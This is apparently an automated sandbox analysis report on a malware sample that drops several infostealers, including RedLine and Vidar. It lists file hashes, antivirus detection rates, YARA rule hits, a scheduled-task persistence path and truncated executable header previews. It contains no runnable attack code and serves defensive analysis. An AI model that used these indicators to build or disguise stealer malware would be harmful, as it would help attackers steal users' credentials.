                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.251.209.3, 142.250.184.78, 74.125.11.6
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): r1---sn-4g5e6ns6.gvt1.com, client.wns.windows.com, fs.microsoft.com, r1---sn-4g5lznls.gvt1.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, arc.msn.com, ris.api.iris.microsoft.com, redirector.gvt1.com, r5---sn-4g5lzney.gvt1.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net
                                                                                                                                                                      • Execution Graph export aborted for target q1wLT3xKiY.exe, PID 1808 because there are no executed function
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                      18:29:21API Interceptor31x Sleep call for process: powershell.exe modified
                                                                                                                                                                      18:29:56API Interceptor30x Sleep call for process: namdoitntn.exe modified
                                                                                                                                                                      18:30:09Task SchedulerRun new task: COMSurrogate path: C:\Users\user\TypeRes\DllResource.exe
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      No context
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):347136
                                                                                                                                                                      Entropy (8bit):6.626098895117023
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Y7v3qLsCqxXXFaNOq7trETZdZjPLUQxIAi/9xlNtQ/3N:Y7vbfQOkrETZdZjPv10RNk
                                                                                                                                                                      MD5:501E0F6FA90340E3D7FF26F276CD582E
                                                                                                                                                                      SHA1:1BCE4A6153F71719E786F8F612FBFCD23D3E130A
                                                                                                                                                                      SHA-256:F07D918C6571F11ABF9AB7268AC6E2ECBCD931C3D9D878895C777D15052AAE2B
                                                                                                                                                                      SHA-512:DEE3AABFCA7912F15B628253222CFE8D8E13CD64F0438E8D705B68B0A14B4C9523B7A207583BE7B424E444D6B05F237484A0C38BF2E075D347EF937D409A3A69
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)./.H.|.H.|.H.|..+|.H.|..(|.H.|..>|.H.|...|.H.|.H.|.H.|..9|.H.|..)|.H.|..,|.H.|Rich.H.|................PE..L.....@a.................r...~.......4............@.........................................................................dq..P................................... ...............................`...@............................................text...xq.......r.................. ..`.data...Hv...........v..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):289792
                                                                                                                                                                      Entropy (8bit):6.577062814012659
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5RkvX/oM13YFXHmI4SSKdOctknX59Zzm0PxwJ:3Wp13YFXO9nX59ZS0CJ
                                                                                                                                                                      MD5:86C2F03BBB61BDCAF1AE4BFB22CC2D31
                                                                                                                                                                      SHA1:BD4D43346FDA88073A2832AA68A832DA7FBA92D2
                                                                                                                                                                      SHA-256:68E686F07EAB2A6D3DA3E045E5A27614B6225AECD5E373D3E788281207F7EE3C
                                                                                                                                                                      SHA-512:4D9F01819D8D8536A0B0E17DA8742CC2D01240A899E00F5338DB8FC0A37536A16C4F1A112475C5F6A017DB534144819CE8D6A22F1C346D38363854208C6A01D1
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe, Author: unknown
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.}.m.}.m.}.m..Km.}.m...m.}.m..Vm.}.m..Fm.}.m.}.m.}.m..~m.}.m..Hm.}.mRich.}.m................PE..L......c................. ...~...............0....@.......................................@.....................................(............................p..\<......................................@............0..L............................text...[........ .................. ..`.rdata..h....0.......$..............@..@.data....Q..........................@....reloc..hL...p...N..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):290304
                                                                                                                                                                      Entropy (8bit):6.579401645714669
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:bsMZN00ag9n0A12I4azih0o3n4+nKyIXszhO3UJcC:tN0ng9nB1+a+nKyPFOkJcC
                                                                                                                                                                      MD5:F5D13E361F8B9ACA7103CB46B441034B
                                                                                                                                                                      SHA1:090DCC68F4CE59D1C5B8B7424508C4033EE418DD
                                                                                                                                                                      SHA-256:A5AD514ED54F1F8F0A8E054B0DC3A39D13D70E388711DDB9D44095A5A89317BF
                                                                                                                                                                      SHA-512:DB8F615405C3DCBB2E525903A572E13565F184BC8C1A2674138A84774DD06041A9899006B8599A25F06CE4FBA92C12D102772E74BE62AC6D02B5BC0AC4EE124A
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe, Author: unknown
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.}.m.}.m.}.m..Km.}.m...m.}.m..Vm.}.m..Fm.}.m.}.m.}.m..~m.}.m..Hm.}.mRich.}.m................PE..L...M..c................."...~......]........@....@.......................................@.................................|...(................................<......................................@............@..L............................text...8!.......".................. ..`.rdata.......@.......&..............@..@.data....Q... ......................@....reloc...L.......N... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):721408
                                                                                                                                                                      Entropy (8bit):4.496128932092844
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:gvGyYiSDnt1k5vWp1icKAArDZz4N9GhbkENEkEMEwnuxm9G01vbLque0Ys8L9dZs:E4Dp0yN90vEvMEwnF1vCuU4QxomgOa
                                                                                                                                                                      MD5:CE94CE7DE8279ECF9519B12F124543C3
                                                                                                                                                                      SHA1:BE2563E381439ED33869A052391EEC1DDD40FAA0
                                                                                                                                                                      SHA-256:F88D6FC5FD36EF3A9C54CF7101728A39A2A2694A0A64F6AF1E1BEFACFBC03F20
                                                                                                                                                                      SHA-512:9697CFC31B3344A2929B02ECDF9235756F4641DBB0910E9F6099382916447E2D06E41C153FAD50890823F068AE412FB9A55FD274B3B9C7929F2CA972112CC5B7
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 37%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......le.Z(...(...(...Mb..)...Mb..*...Mb..:...Mb..9...(.......Mb..!...Mbh.)...Mb..)...Rich(...........................PE..d................."......t...........y.........@.............................`...........`.......... ...................................................Z...................P.. .......T............................................... ............................text...0s.......t.................. ..`.rdata...".......$...x..............@..@.data...............................@....pdata..............................@..@.rsrc....Z.......\..................@..@.reloc.. ....P......................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):109568
                                                                                                                                                                      Entropy (8bit):5.74839124004363
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:9cvFBgCYKpi8IVJFKQ6OUxuvQc0ZpDHh64EASNh:9cv+t36jo4c+Hh64jS
                                                                                                                                                                      MD5:2647A5BE31A41A39BF2497125018DBCE
                                                                                                                                                                      SHA1:A1AC856B9D6556F5BB3370F0342914EB7CBB8840
                                                                                                                                                                      SHA-256:84C7458316ADF09943E459B4FB1AA79BD359EC1516E0AD947F44BDC6C0931665
                                                                                                                                                                      SHA-512:68F70140AF2AD71A40B6C884627047CDCBC92B4C6F851131E61DC9DB3658BDE99C1A09CAD88C7C922AA5873AB6829CF4100DC12B75F237B2465E22770657AE26
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: ditekSHen
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: unknown
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .................0................. ........@.. ....................................@.....................................O...................................d................................................ ............... ..H............text...@.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):775168
                                                                                                                                                                      Entropy (8bit):6.7110819961841575
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:7RUQ/DK21WSRL3oXY+/zNi7Dha0pePTvJRXYBVMAqn4jNZYXm0ipZZBPA76:77zXL3oXVw700pe7zXYBVgn4jNZYXdik
                                                                                                                                                                      MD5:3EC059BD19D6655BA83AE1E644B80510
                                                                                                                                                                      SHA1:61FA49D4473E91509B32A3B675A236B1EAB74D08
                                                                                                                                                                      SHA-256:7DC81DC72CB4F89AD022BB15419E1B6170CF77942B8EC29839924B7B4FE7896C
                                                                                                                                                                      SHA-512:5324C3A902B96D5782E01DD0BFB177055A6908112C60C85AF49C7E863B62F0947D6E18D5AC370652008C5983B0C8BD762AB4444822D0AD547A88883970ADABE9
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................".........../.......@....@..........................P...................@..............................H$.................................................................................................................CODE..... .......".................. ..`DATA.....'...@...(...&..............@...BSS.....9....p.......N...................idata..H$.......&...N..............@....tls.................t...................rdata...............t..............@..P.reloc..............v..............@..P.rsrc................*..............@..P.............P......................@..P........................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):109568
                                                                                                                                                                      Entropy (8bit):5.749974684688708
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:NcvFB4CYHpiVIlf0By1C+4IQclHbTTh/4EASNB:NcvGt91Cdxc9Th/4jS
                                                                                                                                                                      MD5:BBD8EA73B7626E0CA5B91D355DF39B7F
                                                                                                                                                                      SHA1:66E298653BEB7F652EB44922010910CED6242879
                                                                                                                                                                      SHA-256:1AA3FDC24E789B01A39944B85C99E4AC08864D2EAE7530164CEA2821ACBF184E
                                                                                                                                                                      SHA-512:625CC9C108B4660030BE1282493700E5F0CCFB973F466F61254ED1E1A96F5F042CDEAA94607825A2F694647468E2F525A6451542FE3AAC785EBAC1CCFE39864F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, Author: Joe Security
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ........@.. ....................................@.................................p...O...................................T................................................ ............... ..H............text...0.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1810960
                                                                                                                                                                      Entropy (8bit):7.956922547006569
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:SdAhjSod/EhksaOenaSJP0BOE5yM5gPHVtC30:SdAhjSOshksaOQRaL5g9Ak
                                                                                                                                                                      MD5:63FD052610279F9EB9F1FEE8E262F2A4
                                                                                                                                                                      SHA1:AAC344ED6F54C367BE51EFFBF6E84128EE8C6992
                                                                                                                                                                      SHA-256:955C265A378008EFEE8F0D19C2880D1026F32F7CD6325E0AB1A24C833905BBBA
                                                                                                                                                                      SHA-512:234BC89538336452938FBE1E6774F5F7CA47C735F871AC3BA54A3EA6B68C48970FC53239EA72D5CA176F3ACC00932E479020C38CAD66A0F70A3ACDA5B5AFF9B9
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 45%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.u.\.u.\.u.3...T.u.3.....u.U...Y.u.\.t..u.3...S.u.3...].u.\...Z.u.3...].u.Rich\.u.........................PE..L...|..X............................`R............@.................................u.......................................d...<.......(............................................................*..@...............8............................text............................... ..`.data....;..........................@....rsrc...(...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):290304
                                                                                                                                                                      Entropy (8bit):6.577888222739814
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:78D5s4D87i0uI4tRiem9ImbTe/iQnj6AlzYjj0Ju:eJD87i0Wzm9IOQnj6Al0jIJ
                                                                                                                                                                      MD5:E0C8728412F5F7E97698C72DA925C5E6
                                                                                                                                                                      SHA1:1384D6CA09869D8CDDEC443936D75FB5E937F920
                                                                                                                                                                      SHA-256:DAFCE710DB720216E5CCCE685848AAA84B27BBAF6DE356E73F09A125CFD0A618
                                                                                                                                                                      SHA-512:A3BB5E22C564F64ADAD117EB76ECC3F415F56BE6F26D3F68ECEE8740B750FEC8395D39581E41DD68A4BB263763C9686F1E7E44D46B83B3C09FDCF05BC8716BB3
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.}.m.}.m.}.m..Km.}.m...m.}.m..Vm.}.m..Fm.}.m.}.m.}.m..~m.}.m..Hm.}.mRich.}.m................PE..L......c................."...~...............@....@.......................................@.................................|...(................................<......................................@............@..L............................text.... .......".................. ..`.rdata.......@.......&..............@..@.data....Q... ......................@....reloc...L.......N... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\q1wLT3xKiY.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):251904
                                                                                                                                                                      Entropy (8bit):5.913622549255359
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:i35DsWXcPE0JmESvS85n/f+jEaZfdSsbArGx/KjObJguq:f3KvF5n/f+jEaZfdSsbArGx/KjObJgv
                                                                                                                                                                      MD5:414FFD7094C0F50662FFA508CA43B7D0
                                                                                                                                                                      SHA1:6EC67BD53DA2FF3D5538A3AFCC6797AF1E5A53FB
                                                                                                                                                                      SHA-256:D3FB9C24B34C113992C5C658F6A11F9620DA2E49D12D1ACABE871E1BEA7846EE
                                                                                                                                                                      SHA-512:C6527077B4822C062E32C39BE06E285916B501A358991D120A469F5DA1E13D282685CA7CA3FA938292D5BEEF073FBEA42FF9BA96FA5C395F057F7C964608A399
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: ditekSHen
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: unknown
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 80%
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n.................0.................. ........@.. .......................@............@.................................d...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........N......:....................................................m..3>.r...f.gY.D"...E.2V~..*.x...h.\.{.yO8...z'...[^....}..T.w...T.:.Z.<...>j(.....8:PH4....|.r)V6I.C{m.........I.|..s..`.".#../..'.@Z.<..$.....bb..Y%k....`&....N.Q....-.S.Mv#gS.e. .c...U......}.......+.......S....h...C..\..;.eD.0......m...?..b.r..0E.q>.f4!./X...*.....o..*F.k.tj..B.i.Rv.....@...-L.u...R.-.K_/w.VP..EMd.j1....=......t.R....&.1m.#:.n.j...'..|...H...NB*.D.F..s..sU.6._o.
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\brokerius.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2891393435168748
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                                      MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                                      SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                                      SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                                      SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\real.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147456
                                                                                                                                                                      Entropy (8bit):0.5761952958297275
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:rKMovZg1RW755aOYdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3uQME+Sc09sYeP:7sh7f6K+H3HDi9GN6IVj3XBBE3uVOeP
                                                                                                                                                                      MD5:C2745FE6405890300104D02DB7E06DBC
                                                                                                                                                                      SHA1:A121E1232F53E819E8078B9D06B8609738D81053
                                                                                                                                                                      SHA-256:B82E6E87187AF93907361D9AA6BDF322C8E6D79FD52D2AF565D9D7FBC7ED22C3
                                                                                                                                                                      SHA-512:F0A3B79355DB2945C59419E9DE748BBE40133391E81B7AFFE669ECBB933459A11C99F6D54B4B866260E13C09CF7DA9BD605CFF5C21F98A941EE6055FC8900147
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\WW1.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                      Entropy (8bit):0.7876734657715041
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\brokerius.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147456
                                                                                                                                                                      Entropy (8bit):0.5761952958297275
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:rKMovZg1RW755aOYdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3uQME+Sc09sYeP:7sh7f6K+H3HDi9GN6IVj3XBBE3uVOeP
                                                                                                                                                                      MD5:C2745FE6405890300104D02DB7E06DBC
                                                                                                                                                                      SHA1:A121E1232F53E819E8078B9D06B8609738D81053
                                                                                                                                                                      SHA-256:B82E6E87187AF93907361D9AA6BDF322C8E6D79FD52D2AF565D9D7FBC7ED22C3
                                                                                                                                                                      SHA-512:F0A3B79355DB2945C59419E9DE748BBE40133391E81B7AFFE669ECBB933459A11C99F6D54B4B866260E13C09CF7DA9BD605CFF5C21F98A941EE6055FC8900147
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\brokerius.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):147456
                                                                                                                                                                      Entropy (8bit):0.5761952958297275
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:rKMovZg1RW755aOYdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3uQME+Sc09sYeP:7sh7f6K+H3HDi9GN6IVj3XBBE3uVOeP
                                                                                                                                                                      MD5:C2745FE6405890300104D02DB7E06DBC
                                                                                                                                                                      SHA1:A121E1232F53E819E8078B9D06B8609738D81053
                                                                                                                                                                      SHA-256:B82E6E87187AF93907361D9AA6BDF322C8E6D79FD52D2AF565D9D7FBC7ED22C3
                                                                                                                                                                      SHA-512:F0A3B79355DB2945C59419E9DE748BBE40133391E81B7AFFE669ECBB933459A11C99F6D54B4B866260E13C09CF7DA9BD605CFF5C21F98A941EE6055FC8900147
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\WW1.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):94208
                                                                                                                                                                      Entropy (8bit):1.2891393435168748
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                                                                                                                                      MD5:037D23498B81732EEAAAD0E8015F3F85
                                                                                                                                                                      SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                                                                                                                                      SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                                                                                                                                      SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\brokerius.exe
                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                      Entropy (8bit):0.7876734657715041
                                                                                                                                                                      Encrypted:false
